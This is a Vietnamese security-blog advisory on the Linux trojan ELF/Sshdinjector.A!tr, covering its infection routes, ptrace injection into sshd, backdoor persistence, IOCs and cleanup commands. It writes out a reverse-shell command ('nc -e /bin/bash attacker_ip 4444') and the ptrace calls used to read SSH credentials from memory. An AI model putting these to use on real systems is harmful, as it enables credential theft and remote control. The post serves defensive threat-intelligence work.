Skip to main content
HashnodeFPT IS SecurityFPT IS Security

Command Palette

Search for a command to run...

Biến thể phần mềm độc hại mới nhắm vào các hệ thống Linux và thiết bị IOT

Updated
5 min read
Biến thể phần mềm độc hại mới nhắm vào các hệ thống Linux và thiết bị IOT
L
Lưu Tuấn Anh
Part of seriesNewsletters

Tổng quan

ELF/Sshdinjector.A!tr là một trojan Linux được thiết kế để chèn mã độc vào tiến trình SSH (sshd), đánh cắp thông tin đăng nhập và tạo Backdoor cho hacker. Các mẫu của phần mềm độc hại này được phát hiện chính vào giữa tháng 11 năm 2024

Mô tả

  • Loại: Trojan

  • Tên đầy đủ: ELF/Sshdinjector.A!tr

  • Mục tiêu: Hệ điều hành Linux

  • Cách lây nhiễm:

    • Tận dụng lỗ hổng bảo mật trên hệ thống Linux

    • Lây nhiễm qua SSH bằng cách đánh cắp thông tin xác thực

    • Được chèn vào tiến trình hợp pháp như sshd để ẩn mình

Chi tiết kỹ thuật tấn công

  • Mặc dù phương thức lây nhiễm ban đầu không được công bố chi tiết nhưng mã độc ELF/Sshdinjector.A!tr sẽ thực hiện lây nhiễm thông qua 3 cách chính:

    • Khai thác lỗ hổng bảo mật: Mã độc có thể lợi dụng các lỗ hổng trên hệ thống Linux chưa cập nhật, trong đó có 2 CVE được ghi nhận là:

      • CVE-2021-3156 - Lỗ hổng leo thang đặc quyền trên sudo.

      • CVE-2019-12735 (Vim & Neovim) – Lỗ hổng thực thi mã từ xa qua tập tin .vimrc.

    • Brute-force SSH: Nếu hệ thống sử dụng mật khẩu yếu, trojan có thể brute-force (tấn công đoán mật khẩu) để truy cập vào tài khoản root.

    • Lây nhiễm qua phần mềm độc hại: Được cài đặt thông qua các gói phần mềm giả mạo hoặc mã độc từ bên thứ ba.

CVE-2021-3156 | feather's blog

  • Ngay sau khi trojan xâm nhập được vào hệ thống, nó sẽ chèn mã độc vào tiến trình SSHD (Secure Shell Daemon). Điều này sẽ giúp kẻ tấn công thực hiện ẩn mình trong hệ thống và tránh bị phát hiện. Mã độc có thể sử dụng ptrace() để gắn vào tiến trình sshd và đọc dữ liệu từ bộ nhớ.

    • ptrace(PTRACE_ATTACH, target_pid, NULL, NULL): Gắn vào tiến trình sshd.

    • PTRACE_PEEKDATA: Đọc dữ liệu từ bộ nhớ (ví dụ: có thể lấy thông tin đăng nhập).

    • PTRACE_DETACH: Thoát khỏi tiến trình sau khi lấy dữ liệu.

  • Sau đó khi người dùng đăng nhập SSH, mã độc sẽ ghi lại thông tin đăng nhập và gửi về máy chủ điều khiển (C2 Server): 45.125.64[.]200

  • Sau khi đã có thể chèn mã độc vào tiến trình SSHD, kẻ tấn công sẽ tạo một Backdoor để có thể duy trì được quyền truy cập hệ thống. Trojan sẽ tạo Backdoor bằng cách:

    • Thay đổi tệp ~/.ssh/authorized_keys để thêm khóa SSH của hacker.

    • Sửa đổi sshd_config để cho phép đăng nhập root từ xa.

    • Cài đặt cronjob hoặc rootkit để tự động khởi động lại sau khi bị tắt.

  • Bên cạnh đó, một cách khác mà mã độc có thể thực hiện là thay đổi tệp PAM /etc/pam.d/sshd để ghi lại mật khẩu

  • Sau đó, mã độc sẽ tạo một script logger.sh để ghi lại mật khẩu:

  • Khi đã duy trì được kết nối liên tục đến máy nạn nhân, kẻ tấn công sẽ thực hiện tạo các Reverse shell để có thể gửi dữ liệu về máy chủ điều khiển C2 Server “nc -e /bin/bash attacker_ip 4444“. Hoặc kẻ tấn công có thể sử dụng một đoạn mã Python

  • Cuối cùng những kẻ tấn công sẽ thực hiện lẩn tránh trong hệ thống của nạn nhân. Một số biện pháp được ghi nhận chong chiến dịch lần này:

    • Ẩn tiến trình độc hại bằng cách đổi tên hoặc giả mạo tiến trình hợp pháp.

    • Tắt tường lửa và phần mềm bảo mật nếu có quyền root.

    • Sử dụng kỹ thuật rootkit để che giấu hoạt động.

Ảnh hưởng của ELF/Sshdinjector.A!tr

ELF/Sshdinjector.A!tr là một trojan Linux nguy hiểm, chủ yếu lây nhiễm vào hệ thống thông qua SSH. Khi bị nhiễm, nó có thể đánh cắp thông tin, tạo backdoor, làm hệ thống chậm hoặc thậm chí biến server của bạn thành botnet. Một số ảnh hưởng chính của mã độc này được ghi nhận:

  • Đánh cắp thông tin đăng nhập SSH

  • Cài đặt Backdoor & duy trì quyền kiểm soát

  • Lạm dụng tài nguyên server để đào tiền ảo (Cryptojacking)

  • Biến server thành botnet để tấn công DDoS

  • Thay đổi tệp hệ thống & phá hoại dữ liệu

  • Lây lan sang hệ thống khác qua SSH Worm

IOC

  1. IP:

    • 45.125.64[.]200

  2. Hash:

    • 94e8540ea39893b6be910cfee0331766e4a199684b0360e367741facca74191f

    • 0e2ed47c0a1ba3e1f07711fb90ac8d79cb3af43e82aa4151e5c7d210c96baebb

    • 6d08ba82bb61b0910a06a71a61b38e720d88f556c527b8463a11c1b68287ce84

Khuyến nghị

Trong trường hợp nếu như hệ thống của bạn đã bị nhiễm ELF/Sshdinjector.A!tr thì cần thực hiện các hành động sau:

  1. Kiểm tra tiến trình SSH

    • ps aux | grep sshd

    • Nếu phát hiện tiến trình SSH từ thư mục lạ như/tmp/, /var/tmp/ dừng ngay bằng:

      • kill -9

  2. Quét hệ thống tìm mã độc

    • Cài rkhunterchkrootkit: sudo apt install rkhunter chkrootkit -y

    • Chạy chương trình và thực hiện dò quét:

      • sudo rkhunter --check

      • sudo chkrootkit

  3. Kiểm tra tài khoản lạ & xóa ngay

    • cat /etc/passwd | grep bash

    • Nếu như thấy có User thì có thể xóa bằng Command: sudo userdel -r <username>

  4. Cài lại SSH nếu bị thay thế

    • sudo apt reinstall openssh-server

  5. Giới hạn IP truy cập SSH

    • sudo ufw allow from <địa chỉ IP của bạn> to any port 22

Kết luận

ELF/Sshdinjector.A!tr là một trojan cực kỳ nguy hiểm, có khả năng đánh cắp thông tin SSH, tạo backdoor và gửi dữ liệu về hacker. Nếu bạn nghi ngờ hệ thống của mình bị nhiễm, hãy cách ly ngay, kiểm tra tiến trình sshd, quét rootkit và cập nhật hệ thống.

Tham khảo

  1. Analyzing ELF/Sshdinjector.A!tr with a Human and Artificial Analyst | FortiGuard Labs

  2. New trojan hijacks Linux and IoT devices | CSO Online

#trojan#linux#iot

Comments

Join the discussion

No comments yet. Be the first to comment.

Newsletters

Part 1 of 50

More from this blog

F

FPT IS Security

761 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.